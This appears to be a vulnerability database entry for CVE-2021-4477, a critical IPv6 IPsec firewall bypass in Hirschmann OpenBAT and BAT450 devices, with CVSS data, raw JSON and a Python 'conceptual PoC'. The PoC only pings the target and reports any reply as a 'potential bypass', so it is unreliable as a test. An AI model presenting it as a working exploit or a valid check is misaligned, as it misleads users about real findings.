Security Vulnerability Report
CVE-2021-4477 CVSS 9.1 CRITICAL

CVE-2021-4477

Published: 2026-04-03 23:17:01
Last Modified: 2026-04-07 13:20:55

Description

Hirschmann HiLCOS OpenBAT and BAT450 products contain a firewall bypass vulnerability in IPv6 IPsec deployments that allows traffic from VPN connections to bypass configured firewall rules. Attackers can exploit this vulnerability by establishing IPv6 IPsec connections (IKEv1 or IKEv2) while simultaneously using an IPv6 Internet connection to circumvent firewall policy enforcement.

CVSS Details

CVSS Score: 9.1
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Hirschmann HiLCOS OpenBAT
Hirschmann BAT450

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# Conceptual PoC for CVE-2021-4477
# This script demonstrates the logic to test IPv6 IPsec firewall bypass.
# Requires scapy: pip install scapy
import sys

from scapy.all import ICMPv6EchoRequest, IPv6, sr1


def check_bypass(target_ip, internal_ip):
    """
    Simulates sending traffic to check if firewall rules are bypassed.
    Note: Actual exploitation requires establishing an IPsec tunnel.
    """
    print(f"[*] Target: {target_ip}")
    # internal_ip is only reported here; the probe below is addressed to target_ip.
    print(f"[*] Testing bypass to internal resource: {internal_ip}")

    # Craft an IPv6 packet. In a real scenario, this might be encapsulated
    # or crafted to exploit the specific logic flaw in the device.
    # Here we simulate a packet that should be blocked but isn't due to the bypass.
    pkt = IPv6(dst=target_ip) / ICMPv6EchoRequest(data=b"CVE-2021-4477 Test")

    # Send packet and wait for response.
    # An echo reply only shows that the target is reachable over IPv6; it does
    # not by itself show that a firewall rule was bypassed.
    resp = sr1(pkt, timeout=2, verbose=0)

    if resp:
        print("[+] Potential bypass detected! Response received.")
        print(f"[+] Response: {resp.summary()}")
        return True
    else:
        print("[-] No response. Traffic may be blocked or host unreachable.")
        return False


if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python3 cve_2021_4477_poc.py <target_ipv6> <internal_ipv6>")
        sys.exit(1)

    target = sys.argv[1]
    internal = sys.argv[2]
    check_bypass(target, internal)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2021-4477", "sourceIdentifier": "[email protected]", "published": "2026-04-03T23:17:01.043", "lastModified": "2026-04-07T13:20:55.200", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Hirschmann HiLCOS OpenBAT and BAT450 products contain a firewall bypass vulnerability in IPv6 IPsec deployments that allows traffic from VPN connections to bypass configured firewall rules. Attackers can exploit this vulnerability by establishing IPv6 IPsec connections (IKEv1 or IKEv2) while simultaneously using an IPv6 Internet connection to circumvent firewall policy enforcement."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", 
"Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://assets.belden.com/m/5fd1a50fa50cb252/original/Belden-Security-Bulletin-BSECV-1v0-2019-09.pdf", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/hirschmann-hilcos-openbat-bat450-ipv6-ipsec-firewall-bypass", "source": "[email protected]"}]}}